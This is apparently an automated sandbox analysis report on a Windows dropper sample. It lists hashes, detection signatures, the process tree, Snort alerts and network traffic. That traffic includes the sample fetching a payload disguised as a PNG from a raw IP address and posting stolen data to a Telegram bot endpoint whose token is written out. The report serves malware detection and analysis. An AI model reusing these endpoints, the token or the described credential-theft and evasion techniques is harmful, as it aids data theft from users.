
Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Analysis ID: 722938
MD5: a93394c0d7a32e0ae2ba43a6fd881301
SHA1: b7c51ec181c8751f752e14dba96132a83eeaa7a8
SHA256: cb05606b742226130a4e421b47b04bee21b4da79bb883c15a3c6a9002d8dfa7d
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
.NET source code contains potential unpacker
Machine Learning detection for dropped file
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)

Classification

Classification chart (radar plot; only its labels survived extraction): categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean / suspicious / malicious.
  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe (PID: 5792 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe MD5: A93394C0D7A32E0AE2BA43A6FD881301)
    • powershell.exe (PID: 4892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA== MD5: DBA3E6449E97D4E3DF64527EF7012A10) (the -enc argument base64-decodes, as UTF-16LE, to: Start-Sleep -Seconds 56)
      • conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 1012 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • RegAsm.exe (PID: 5800 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • RegAsm.exe (PID: 3092 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • Fdmru.exe (PID: 4972 cmdline: "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe" MD5: A93394C0D7A32E0AE2BA43A6FD881301)
  • Fdmru.exe (PID: 5500 cmdline: "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe" MD5: A93394C0D7A32E0AE2BA43A6FD881301)
  • cleanup
No configs have been found
Yara matches in memory dumps (5 of 8 entries shown):
Source | Rule | Description | Author | Strings
00000000.00000002.666417537.000000000B141000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.571519401.0000000007C95000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000003.291180894.00000000092C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000010.00000000.495309818.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Yara matches in unpacked PE files:
Source | Rule | Description | Author | Strings
16.0.RegAsm.exe.400000.0.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.7cdfeec.3.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.aec1038.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.aec1038.6.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

No Sigma rule has matched
Snort IDS alerts
Timestamp | Source | Destination | Protocol | SID | Classtype
10/14/22-00:42:30.686053 | 41.216.183.235:80 | 192.168.2.3:49699 | TCP | 2012252 | Executable code was detected
10/14/22-00:42:30.034188 | 41.216.183.235:80 | 192.168.2.3:49699 | TCP | 2017962 | A Network Trojan was detected
10/14/22-00:42:29.991059 | 192.168.2.3:49699 | 41.216.183.235:80 | TCP | 2034631 | A Network Trojan was detected
10/14/22-00:44:33.586734 | 41.216.183.235:80 | 192.168.2.3:49700 | TCP | 2022640 | A Network Trojan was detected
10/14/22-00:44:33.554000 | 192.168.2.3:49700 | 41.216.183.235:80 | TCP | 2034631 | A Network Trojan was detected
10/14/22-00:44:48.157973 | 192.168.2.3:49701 | 41.216.183.235:80 | TCP | 2034631 | A Network Trojan was detected
10/14/22-00:44:33.870351 | 41.216.183.235:80 | 192.168.2.3:49700 | TCP | 2012252 | Executable code was detected
10/14/22-00:42:30.034188 | 41.216.183.235:80 | 192.168.2.3:49699 | TCP | 2022640 | A Network Trojan was detected
10/14/22-00:44:33.586734 | 41.216.183.235:80 | 192.168.2.3:49700 | TCP | 2017962 | A Network Trojan was detected
10/14/22-00:44:48.194634 | 41.216.183.235:80 | 192.168.2.3:49701 | TCP | 2017962 | A Network Trojan was detected
10/14/22-00:44:48.194634 | 41.216.183.235:80 | 192.168.2.3:49701 | TCP | 2022640 | A Network Trojan was detected
10/14/22-00:44:48.589687 | 41.216.183.235:80 | 192.168.2.3:49701 | TCP | 2012252 | Executable code was detected


AV Detection

Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Virustotal: Detection: 22%
Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe | Virustotal: Detection: 22%
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe | Joe Sandbox ML: detected
Source: 18.3.Fdmru.exe.764bf14.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb | source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 | source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb | source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ | source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: BouncyCastle.Crypto.pdb | source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: BouncyCastle.Crypto.pdbSHA256 | source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Code function: 4x nop then jmp 0120B874h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h (9 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 05280AB3h (2 occurrences)

Networking

Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.3:49699 -> 41.216.183.235:80
Source: Traffic | Snort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 41.216.183.235:80 -> 192.168.2.3:49699
Source: Traffic | Snort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 41.216.183.235:80 -> 192.168.2.3:49699
Source: Traffic | Snort IDS: 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String 41.216.183.235:80 -> 192.168.2.3:49699
Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.3:49700 -> 41.216.183.235:80
Source: Traffic | Snort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 41.216.183.235:80 -> 192.168.2.3:49700
Source: Traffic | Snort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 41.216.183.235:80 -> 192.168.2.3:49700
Source: Traffic | Snort IDS: 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String 41.216.183.235:80 -> 192.168.2.3:49700
Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.3:49701 -> 41.216.183.235:80
Source: Traffic | Snort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 41.216.183.235:80 -> 192.168.2.3:49701
Source: Traffic | Snort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 41.216.183.235:80 -> 192.168.2.3:49701
Source: Traffic | Snort IDS: 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String 41.216.183.235:80 -> 192.168.2.3:49701
Source: unknown | DNS query: name: api.telegram.org (3 queries)
Source: Joe Sandbox View | ASN Name: AS40676US
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
  POST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary="e749d4e4-749a-41ce-b152-70d8d1eceec1"
  Host: api.telegram.org
  Content-Length: 2227
  Expect: 100-continue
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary="faf7003a-b216-46df-be53-6f8f76b435f5"
  Host: api.telegram.org
  Content-Length: 13782
  Expect: 100-continue
Source: global traffic | HTTP traffic detected:
  POST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary="124a0fb1-8a78-4c1b-8ed5-2e41b547b56a"
  Host: api.telegram.org
  Content-Length: 315
  Expect: 100-continue
Source: global traffic | HTTP traffic detected (3 identical requests):
  GET /Fppsmppzh.png HTTP/1.1
  Host: 41.216.183.235
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | TCP traffic detected without corresponding DNS query: 41.216.183.235 (50 occurrences)
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, Fdmru.exe.0.dr | String found in binary or memory: http://41.216.183.235/Fppsmppzh.png
Source: RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.638281280.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: RegAsm.exe, 00000010.00000003.604596489.0000000005410000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.503779743.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
